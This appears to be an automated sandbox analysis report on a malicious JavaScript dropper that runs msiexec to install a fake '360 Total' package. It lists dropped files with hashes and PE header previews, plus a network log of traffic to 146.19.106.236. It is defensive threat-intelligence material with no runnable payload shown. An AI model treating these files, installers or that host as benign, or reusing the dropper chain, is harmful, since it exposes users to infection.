Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..Bwsgi2........P.........................@..........!1)FX?@T#s9Cey$lE<HI0x&%czAYeH9a))*C9%fd8%Z<@zCvcK....................................

C:\Windows\Installer\MSI103.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	401013
Entropy (8bit):	6.591575308456475
Encrypted:	false
SSDEEP:	6144:ZMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1E:ZMvZx0FlS68zBQSncb4ZPQTpAjZxqO1E
MD5:	74219CBF55870B5A2C23D887400E851E
SHA1:	24912A96CE789D0631037DD654F878181A9F87F8
SHA-256:	03744667C2561E223BBBD2F4198DAA2D3D4EC87C5DE7DE267E56D1FFB3CE2580
SHA-512:	8346068537C39906509EA56CDD0B510A935A0B12A51744871DAC1371B74A16227A3E86A4D87D406292412A1C5C57D63C8A3A5B4DF1697E6429C19C432C7C52F0
Malicious:	false
Preview:	...@IXOS.@.....@!..X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..neo.msi.@.....@.....@.....@........&.{6C81CEE0-3161-4D91-A688-254B67D7D838}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}6.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}+.01:\Software\HuMaster LLC\360 Total\Version.@.......@.....@.....@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}4.C:\Users\user\AppData\Local\sharepoint\360total.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".6.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@......

C:\Windows\Installer\MSI181.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399328
Entropy (8bit):	6.589290025452677
Encrypted:	false
SSDEEP:	6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
MD5:	B9545ED17695A32FACE8C3408A6A3553
SHA1:	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
SHA-256:	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
SHA-512:	F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: neo.msi, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse Filename: ad.msi, Detection: malicious, Browse Filename: Document_a19_79b555791-28h97348k5477-3219g9.js, Detection: malicious, Browse Filename: ad.msi, Detection: malicious, Browse Filename: sharepoint.msi, Detection: malicious, Browse Filename: slack.msi, Detection: malicious, Browse Filename: out_bdrts.js, Detection: malicious, Browse Filename: font.msi, Detection: malicious, Browse Filename: Letter_q50_63b944998-11n0283407179-6803z4.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI54.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI846B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {6C81CEE0-3161-4D91-A688-254B67D7D838}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	1620480
Entropy (8bit):	7.153702346443201
Encrypted:	false
SSDEEP:	49152:JZH3YuW8zBQSc0ZnSKmZKumZr7AQB7aLTB:7Y90Zn0K/AQwLF
MD5:	37605A3EB80F3366E56938031A9AC917
SHA1:	0582A0DD69D6027FB94765254ED91AD736ADE305
SHA-256:	4E7AC0BDB516E983B3CAB7F79850D8102D2BF4117BB343B68D0DA73780CCEB1A
SHA-512:	772BB5538F5AF14146D9BCF8D8C29A70860ECDF84B4AF6CC99DAE7589F60847CA7CB87B068BD2AA86F620E79D394C223B96C9FE95FE390E8A9C8422282F5B405
Malicious:	false
Preview:	......................>.......................................................E.......a...............................(...)......+...,...-...........A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)......1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIA3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIFFD6.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5610392526177224
Encrypted:	false
SSDEEP:	48:W8PhluRc06WXOkFT572hi7JWDSCdAECiCyc9FuSipDSCRTd:phl1SFTxcmECZFWd/
MD5:	1FB044B9B827BFABCC16BCAA5B704F03
SHA1:	0A7698862280DE9FDB1A3214DA63357EA05E66E5
SHA-256:	BF5DA8339F6BEA00F985F4C44A0D07E402EF589358F0DF2765D2BCE9A03A48D6
SHA-512:	CA87390D95B595973598242EA7371EEC4370646FD47364C67D0F8A9C9578D6CD6C3B30AF0E030C187D499068D58CCD1E99E10F2CC3BC463DF1A089C9CC040E09
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0673ED736785A4D1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1472FD4508764B7C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2962571C7317E3C5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2C17C88212509880.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.251515898380648
Encrypted:	false
SSDEEP:	48:VmdufPvGFXOZT5C2hi7JWDSCdAECiCyc9FuSipDSCRTd:Id1UTWcmECZFWd/
MD5:	87C28E46F815A530C9D8EF26A4F5B934
SHA1:	A789A744CFC67FA05F7898BC835DE2CDF937D768
SHA-256:	9005E25BD990DCEC70C830EBAB2130F95237982174C048EE54C455DC67A1C0D4
SHA-512:	912F8EFF74BC314F6ED077B7707F33D9E1A224BF76D076A5D1E99A0D693003A93C9C6F418BE75CE1858B6FB1512FDF53F6183DCBBC1091B2B152C5A2AEE6E162
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF41638D872A10A065.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.1358641226917472
Encrypted:	false
SSDEEP:	24:vOQTxkrEsipVkrE+krEsipVkrE2AEVkryjCycV3+bpGZsGgSi+oNwM2+qzM:2QTeDSCKDSCdAECiCyc9FuSiuM2TzM
MD5:	3A97B0EC8898B9E41CD1AE64CF7F1C82
SHA1:	A2B25FBE38F4E32E09F533C754A9175AF687F520
SHA-256:	426FF192A0493B38218563900C47EB35F854702E43ADA9FD90A268F8262F0FBF
SHA-512:	EA3AC8C0568FF8A3B58534699F6562C514AB80CA6EB5C6F863FA85EB72C8ECAC47E8905BAD1858838EE724D3156C949E9C946C30E40DBE2A4B490066A791240F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF42BDB990109EC114.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF61773DAED613FFB9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.251515898380648
Encrypted:	false
SSDEEP:	48:VmdufPvGFXOZT5C2hi7JWDSCdAECiCyc9FuSipDSCRTd:Id1UTWcmECZFWd/
MD5:	87C28E46F815A530C9D8EF26A4F5B934
SHA1:	A789A744CFC67FA05F7898BC835DE2CDF937D768
SHA-256:	9005E25BD990DCEC70C830EBAB2130F95237982174C048EE54C455DC67A1C0D4
SHA-512:	912F8EFF74BC314F6ED077B7707F33D9E1A224BF76D076A5D1E99A0D693003A93C9C6F418BE75CE1858B6FB1512FDF53F6183DCBBC1091B2B152C5A2AEE6E162
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA3E2CC6CAB1B816A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.251515898380648
Encrypted:	false
SSDEEP:	48:VmdufPvGFXOZT5C2hi7JWDSCdAECiCyc9FuSipDSCRTd:Id1UTWcmECZFWd/
MD5:	87C28E46F815A530C9D8EF26A4F5B934
SHA1:	A789A744CFC67FA05F7898BC835DE2CDF937D768
SHA-256:	9005E25BD990DCEC70C830EBAB2130F95237982174C048EE54C455DC67A1C0D4
SHA-512:	912F8EFF74BC314F6ED077B7707F33D9E1A224BF76D076A5D1E99A0D693003A93C9C6F418BE75CE1858B6FB1512FDF53F6183DCBBC1091B2B152C5A2AEE6E162
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA850122BA55067CF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5610392526177224
Encrypted:	false
SSDEEP:	48:W8PhluRc06WXOkFT572hi7JWDSCdAECiCyc9FuSipDSCRTd:phl1SFTxcmECZFWd/
MD5:	1FB044B9B827BFABCC16BCAA5B704F03
SHA1:	0A7698862280DE9FDB1A3214DA63357EA05E66E5
SHA-256:	BF5DA8339F6BEA00F985F4C44A0D07E402EF589358F0DF2765D2BCE9A03A48D6
SHA-512:	CA87390D95B595973598242EA7371EEC4370646FD47364C67D0F8A9C9578D6CD6C3B30AF0E030C187D499068D58CCD1E99E10F2CC3BC463DF1A089C9CC040E09
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC79B60F342C6D33F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF122760D5CC42A2E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5610392526177224
Encrypted:	false
SSDEEP:	48:W8PhluRc06WXOkFT572hi7JWDSCdAECiCyc9FuSipDSCRTd:phl1SFTxcmECZFWd/
MD5:	1FB044B9B827BFABCC16BCAA5B704F03
SHA1:	0A7698862280DE9FDB1A3214DA63357EA05E66E5
SHA-256:	BF5DA8339F6BEA00F985F4C44A0D07E402EF589358F0DF2765D2BCE9A03A48D6
SHA-512:	CA87390D95B595973598242EA7371EEC4370646FD47364C67D0F8A9C9578D6CD6C3B30AF0E030C187D499068D58CCD1E99E10F2CC3BC463DF1A089C9CC040E09
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (533), with CRLF line terminators
Entropy (8bit):	4.542956827560831
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	Document_a51_19i793302-14b09981a5569-3684u8.js
File size:	477'833 bytes
MD5:	b5c04c9ce0a3da2e16e97632e13b5e28
SHA1:	00303f1b540e92a79488fd9b603c5e987cee3734
SHA256:	71a429fdbaa04f8eee80c05b123ba00635569801ca041fdc7c6ac41de8aa72d3
SHA512:	1bad3ec4b845e9592ee7d9c2f29aaf29f7a5d7c0cc84ba33333ea234a07591cc9064ef8245ff46dd1227f268cbb90891d9c53986f8eb1b4eb8d105de2d7e5939
SSDEEP:	6144:ertlgAdYLGKbxpEZE87yi6GtyAjI1p7ZJpO4S+gh0fNUNGndjIz5dYYku+JTiFye:ElCaExOSFky6+gO1/ne5dY/W6ItoepF
TLSH:	D2A46C60EE4101661E83679F9C6226D2FD3CC15183021268E99E93AD1F875DCD37DBAF
File Content Preview:	////function installFromURL() {..// synorchism cottontail peltatodigitate sheepshearer uneducable pachypod transferent Oryctolagus allocation nondiscriminatory exsiccate suet telestereograph myosuture cyphonautes sacramentality unifloral Aquilaria unsacch

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 23:16:22.986298084 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 26, 2024 23:16:24.986246109 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 23:16:29.962639093 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.134099960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.134219885 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.134435892 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.305675030 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306111097 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306157112 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306197882 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306214094 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.306257010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306294918 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306308985 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.306334972 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306375980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306380033 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.306435108 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306473970 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306476116 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.306510925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.306556940 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.477952957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478014946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478055954 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478072882 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478100061 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478140116 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478147984 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478178024 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478214979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478219032 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478252888 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478303909 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478312016 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478351116 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478385925 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478389025 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478427887 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478483915 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478486061 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478523970 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478560925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478568077 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478600025 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478636980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478637934 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478674889 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478714943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478719950 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.478751898 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.478797913 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651187897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651257992 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651295900 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651308060 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651335955 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651374102 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651376009 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651412964 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651453972 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651458979 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:30.651492119 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:30.651530027 CEST	80	49732	146.19.106.236	192.168.2.4
